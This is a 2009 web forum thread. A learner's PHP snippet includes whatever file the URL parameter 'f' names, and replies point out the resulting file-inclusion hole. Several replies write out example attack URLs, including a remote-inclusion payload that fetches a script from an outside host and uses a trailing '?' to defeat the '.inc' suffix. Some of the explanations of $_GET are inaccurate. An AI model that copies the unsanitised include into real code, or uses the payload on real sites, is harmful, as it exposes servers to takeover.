Wickham Posted August 11, 2009 Report Share Posted August 11, 2009 (edited) I've been told about a PHP code that allows an include file to show something on the same page only after a link is clicked; it's better than Javascript because it works when javascript is disabled and the code is very small:- http://www.wickham43.com/test/php-show-form.php Form 1 <?php error_reporting(0); include ($_GET['f'].".inc"); ?> and the form1.inc just has the form code. At first I was trying it without error_reporting(0); but although it worked I got several warnings on the online page that showed on the page:- Warning: include(.inc) [function.include]: failed to open stream: No such file or directory in /home/my-username/public_html/sub-directory/php-show-form.php on line 25 Warning: include(.inc) [function.include]: failed to open stream: No such file or directory in /home/my-username/public_html/sub-directory/php-show-form.php on line 25 Warning: include() [function.include]: Failed opening '.inc' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/my-username/public_html/sub-directory/php-show-form.php on line 25 Line 25 was <?php include ($_GET['f'].".inc");?> The warnings for the same page in WampServer were:- Notice: Undefined index: f in C:\wamp\www\test\php-show-form.php on line 25 Warning: include(.inc) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test\php-show-form.php on line 25 Warning: include() [function.include]: Failed opening '.inc' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test\php-show-form.php on line 25 Is it expecting a variable somewhere? Is there a better code without warnings? I've also tried Form 1 <?php include ($_GET[f]);?> where the .inc is in the link instead of the include which also works but I still get warnings, just one less warning. EDIT: I've just got an answer from the guy who told me the code (he had to work it out):- Form 1 <?php if ($_GET['f']) {include ($_GET['f'].".inc");} ?> error_reporting(0); not required. As an extra question why and what is f? If I substitute g or id it doesn't work, so f must be a PHP operator and it's not a variable. Where can I find out what its features are? Edited August 14, 2009 by Wickham Quote Link to comment Share on other sites More sharing options...
dms Posted August 12, 2009 Report Share Posted August 12, 2009 Just learning PHP myself, but I do remember reading something about setting the include_path in the php.ini file. Maybe this is something worth looking into. I would think that [f] would be the index or key within the $_GET array, which is a variable, so you may trying placing double quotes around it. This is a bit over my head. Good luck. Quote Link to comment Share on other sites More sharing options...
falkencreative Posted August 12, 2009 Report Share Posted August 12, 2009 "f" is a variable in the url: Form 1 In this case, f = "form1.inc" The "f" variable doesn't have to be called "f" it could easily be "include" or something else you specified. In that case though, you'd need to update the code: Form 1 and <?php if ($_GET['include']) {include ($_GET['include'].".inc");} ?> Quote Link to comment Share on other sites More sharing options...
dms Posted August 13, 2009 Report Share Posted August 13, 2009 You must have 'f' set to 0 (f=0) in you php script or not set at all. Then you must have an the if statement to where... if('f'=form1) the form is included in the page. So, within the link you are resending 'f' through the super global $_get and setting the value to 'form1' which would include the form within the page. Try this: click on your Form 1 link to display the form and then in the url change [?f=form1] to [?f=0] and see what happens. The page will be redisplayed without the form, because 'f' was reset to false which would cause the if statement not to elevate to true, so the form will not be displayed. I believe that [f] is the key in the $_GET array which corresponds to the variable $f in your php code. I hope this is making since, because I'm just learning this myself. Quote Link to comment Share on other sites More sharing options...
ASDx Posted August 14, 2009 Report Share Posted August 14, 2009 i was just surfing and i saw your question .... and i want t advice you think if someone discover your url and changed it to this http://www.wickham43.com/test/php-show-form.php?f=dangercode.gif? you will be hacked directly ... so you have to include your file instantly not to get it from the fly or use an array of the safe file names to be included . Quote Link to comment Share on other sites More sharing options...
Wickham Posted August 14, 2009 Author Report Share Posted August 14, 2009 (edited) Thanks for the warning. I had included error_reporting(0); in my first attempt but deleted it when I got the correct code, thinking it wasn't necessary, but I've now put it back in and it stops anyone from seeing the username now (unless there is another way to get someone's username). I had noticed that my username showed in the warning messages for eveyone to see, but not the password. However, it's obviously not a good idea to show the username in a warning message. Tell me if you can still see my username with this revised page:- http://www.wickham43.com/test/php-show-form.php Edited August 14, 2009 by Wickham Quote Link to comment Share on other sites More sharing options...
falkencreative Posted August 14, 2009 Report Share Posted August 14, 2009 The issue is not that your username will show up. The issue is that the user could modify the URL to include files you did not originally intend to be included. They could try to show other files on your server, or even link their own php scripts like so: filename2.php?f=http://www.theirsite.com/theirfile.com Quote Link to comment Share on other sites More sharing options...
Wickham Posted August 14, 2009 Author Report Share Posted August 14, 2009 (edited) I've just tried to do what you mentioned, adding another of my website addresses to the f= instead of the "include" file that I had, and it didn't do anything, just showed the page with the link and nothing included below. Perhaps it's because I now have error_reporting(0); in the PHP code but also because the PHP code adds .inc on the end of whatever is after f= so a full url would have .inc added and be a 404 "not found" if it was partly successful. It would show any other .inc file that I might have on the same directory but there is only one and someone would have to guess its name. However. I really only experimented with the code to learn some more PHP. If it's a dangerous code, what do the experts use to open another file in the same web page from a link (apart from Ajax) or can the code be modified? Edited August 14, 2009 by Wickham Quote Link to comment Share on other sites More sharing options...
ASDx Posted August 14, 2009 Report Share Posted August 14, 2009 if someone icluded a file from a remote website followed by ? it it wll completely igonre anything after they dangerous code for example http://www.wickham43.com/test/php-show-form.phpf=http://s.rr/php_with_some_unix_commands.txt? it will be http://www.wickham43.com/test/php-show-form.php?f=http://h.sr/php_with_some_unix_commands.txt?.inc and everything after ? is ignored so your .inc is will be treated as a part of the query string. Quote Link to comment Share on other sites More sharing options...
dms Posted August 14, 2009 Report Share Posted August 14, 2009 (edited) Since this method is being used to retrieve a form, not submit one; I don't understand how someone could inject something into the 'url', after the fact. Edited August 16, 2009 by dms Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.